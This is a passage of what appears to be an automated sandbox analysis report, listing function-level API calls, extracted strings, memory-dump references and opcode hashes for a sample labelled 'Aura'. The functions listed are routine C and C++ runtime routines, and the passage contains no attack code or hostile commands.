                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088826258-0
                                                                                                                                                                                                                                                    • Opcode ID: b6cdf311eb6274297c9447969e0286f058f431b95d2b7ff0a203fbe75130e034
                                                                                                                                                                                                                                                    • Instruction ID: 4209b2447a6202b87c72fd8794c2d3dda22b26107daa83cfeec90f8cb025ad10
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6cdf311eb6274297c9447969e0286f058f431b95d2b7ff0a203fbe75130e034
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5501B175A012219BEB05EBA0D8519BD77B5FF86750B04400AE801573C2CF385E42CFA2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: GetLastError.KERNEL32(?,?,000B5495,000D8E38,0000000C), ref: 000BC16E
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: SetLastError.KERNEL32(00000000), ref: 000BC210
                                                                                                                                                                                                                                                    • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,000B5BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 000C0A35
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,000B5BD5,?,?,?,00000055,?,-00000050,?,?), ref: 000C0A6C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                    • String ID: ,K$utf8
                                                                                                                                                                                                                                                    • API String ID: 943130320-294975348
                                                                                                                                                                                                                                                    • Opcode ID: 51b0fd9935c2f61c0e7582062ef060c57234faf7a82d789ea3bb9fe1bd4127c1
                                                                                                                                                                                                                                                    • Instruction ID: 0469c988dc0ff20b132f20e40ea3bd7b07cb55ab708c5a37f50120efa173654a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51b0fd9935c2f61c0e7582062ef060c57234faf7a82d789ea3bb9fe1bd4127c1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0951C231644705EAEB68AB358C42FEE73E8EF45704F14042EF6499B182E771ED80C765
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::_Release_chore.LIBCPMT ref: 000A7526
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 000A7561
                                                                                                                                                                                                                                                      • Part of subcall function 000AAF37: CreateThreadpoolWork.KERNEL32(000AB060,000A8A2A,00000000), ref: 000AAF46
                                                                                                                                                                                                                                                      • Part of subcall function 000AAF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 000AAF53
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: Fail to schedule the chore!$G.
                                                                                                                                                                                                                                                    • API String ID: 3683891980-2786361616
                                                                                                                                                                                                                                                    • Opcode ID: ccffe14c261088fb7d8ca98b319ffa2ca07b2981fc6f1548f45f8b36e24d6a2c
                                                                                                                                                                                                                                                    • Instruction ID: bf639ead6aa740d980b06e4bb4622d1de71edb97a0bcf440b9aee16dedd2bec3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccffe14c261088fb7d8ca98b319ffa2ca07b2981fc6f1548f45f8b36e24d6a2c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04519EB0D012089FCB14DF94DC44BAEBBB4FF09314F14812AE8196B391E7799905CFA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 000A3EC6
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 000A4002
                                                                                                                                                                                                                                                      • Part of subcall function 000AABC5: _Yarn.LIBCPMT ref: 000AABE5
                                                                                                                                                                                                                                                      • Part of subcall function 000AABC5: _Yarn.LIBCPMT ref: 000AAC09
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name$|=e.
                                                                                                                                                                                                                                                    • API String ID: 2070049627-889109421
                                                                                                                                                                                                                                                    • Opcode ID: 33798fb511960b189e94c5d8fb12844941172357d85b199930ada0d6fe980cef
                                                                                                                                                                                                                                                    • Instruction ID: 0e1b08839cbdceb16304edd4e14f10eb546439d77692820740470beb04badd4d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33798fb511960b189e94c5d8fb12844941172357d85b199930ada0d6fe980cef
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE415CF0E007459BEB10DF69C805B97BAF8BF05714F044628E5499B781E77AE518CBE2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 000AB809
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: bd001702a50e86c7a0a7331e7aaed4097b79120fb0558fd783fd1bf038654a0c
                                                                                                                                                                                                                                                    • Instruction ID: 4ce2f4e63de3be40e91e05ea6ff0d1fae27d69fff04af16f1e4718b518612458
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd001702a50e86c7a0a7331e7aaed4097b79120fb0558fd783fd1bf038654a0c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4221CF358042059FDB249FE8C856AAEB7ECEF42720F14451EE41187693DB78AA41CA81
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,000A253A,?,?,00000000), ref: 000AF129
                                                                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(?,00000000,?,?,000A253A,?,?,00000000), ref: 000AF142
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,000A253A,?,?,00000000), ref: 000AF154
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                    • String ID: :%
                                                                                                                                                                                                                                                    • API String ID: 2551024706-3734732973
                                                                                                                                                                                                                                                    • Opcode ID: e902795b20570790acc577d7d92016794a76dfa951f200ee5abc35cd644fcafb
                                                                                                                                                                                                                                                    • Instruction ID: 214d5edd43eab8caa10170653656c0fd26f790e5b88f4260907e214bbefca695
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e902795b20570790acc577d7d92016794a76dfa951f200ee5abc35cd644fcafb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0F08231655115EFEF508FA4DC05ABA3BA4EB02770F640321FC21EA1E0E735EE408690
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Yarn
                                                                                                                                                                                                                                                    • String ID: e.$|=e.
                                                                                                                                                                                                                                                    • API String ID: 1767336200-1338432414
                                                                                                                                                                                                                                                    • Opcode ID: 6f6eb047cc6784a691706be6792174063844891b047b8ad7013dadebdb3f659a
                                                                                                                                                                                                                                                    • Instruction ID: 59a1476ce851f2f25e90512a67f00d2d72d0353d3ee38597134ef4e8fa53859c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f6eb047cc6784a691706be6792174063844891b047b8ad7013dadebdb3f659a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6E0E5223583046FF71C7A65EC52BF677DCDB45761F10042EFA1A8A6C3EE10ED0485A5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,000C69DC,00000000,?,000DD2B0,?,?,?,000C6913,00000004,InitializeCriticalSectionEx,000D0D34,000D0D3C), ref: 000C694D
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,000C69DC,00000000,?,000DD2B0,?,?,?,000C6913,00000004,InitializeCriticalSectionEx,000D0D34,000D0D3C,00000000,?,000BBBBC), ref: 000C6957
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 000C697F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                    • Opcode ID: d69492d3fa4028c29adf69a2f2851aad87a349f51ee7b20020cfcef2937d0b38
                                                                                                                                                                                                                                                    • Instruction ID: 241fbba52ffe8b751972fdb1cec98cef0647c8f73d1c2071afe3e73febac1a35
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d69492d3fa4028c29adf69a2f2851aad87a349f51ee7b20020cfcef2937d0b38
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EBE01A30780304BBEF201B60EC06F6D3B99EB45B91F240425FA4CAC4E1DB77EC509954
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(F7EDDA51,00000000,00000000,?), ref: 000C4001
                                                                                                                                                                                                                                                      • Part of subcall function 000BC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,000BD895,?,00000000,-00000008), ref: 000BC082
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000C4253
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 000C4299
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 000C433C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2112829910-0
                                                                                                                                                                                                                                                    • Opcode ID: 614a027a67b4d8c7b99e8a93ab13915f42d8bdfe41f51b86e876b156072665aa
                                                                                                                                                                                                                                                    • Instruction ID: f582280c6309351ebf47e7ceb04595ce1b61af8a06d7524fb373b179cb4f5e96
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 614a027a67b4d8c7b99e8a93ab13915f42d8bdfe41f51b86e876b156072665aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CD15875D002989FDF15CFE8C890AEDBBB5FF49314F28412EE956EB252D630A941CB60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                    • Opcode ID: 589735d948a9ad2ff35d98ed319a33cb9a01428af6c231109ac77ded50365e0b
                                                                                                                                                                                                                                                    • Instruction ID: d337d1a3c900a8c0fea1d5e1f66e18891e1326485cf8b81371d2237d997f6c97
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 589735d948a9ad2ff35d98ed319a33cb9a01428af6c231109ac77ded50365e0b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B251C272A04702AFDB299F50C991BFEB7E4EF00B10F14452DE94697292D7B1EE40DB90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 000A72C5
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A7395
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A73A3
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A73B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2261580123-0
                                                                                                                                                                                                                                                    • Opcode ID: 2a36bd7d4a4a02d8260172374d619d055f78f11f15eda2f9cdefaff668c16a13
                                                                                                                                                                                                                                                    • Instruction ID: 738cbfb7fbdc51cf4e5c848e0641d817e4812cc42701ef1c31807c6f172eae02
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a36bd7d4a4a02d8260172374d619d055f78f11f15eda2f9cdefaff668c16a13
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3141D3B2A003458FDF20DBA4CC417AEB7E4FF46320F158639E81A47692EB34E910CB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 000A4495
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 000A44B2
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 000A44D3
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 000A4580
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 593203224-0
                                                                                                                                                                                                                                                    • Opcode ID: b8ddf10582b053caafed0d3fa4c7afcb79bea6a062508227a77b6d22c7306837
                                                                                                                                                                                                                                                    • Instruction ID: 1690636d42b29341ebb637afefadcac0218209c7e6ef47452a33754ae720a4b2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8ddf10582b053caafed0d3fa4c7afcb79bea6a062508227a77b6d22c7306837
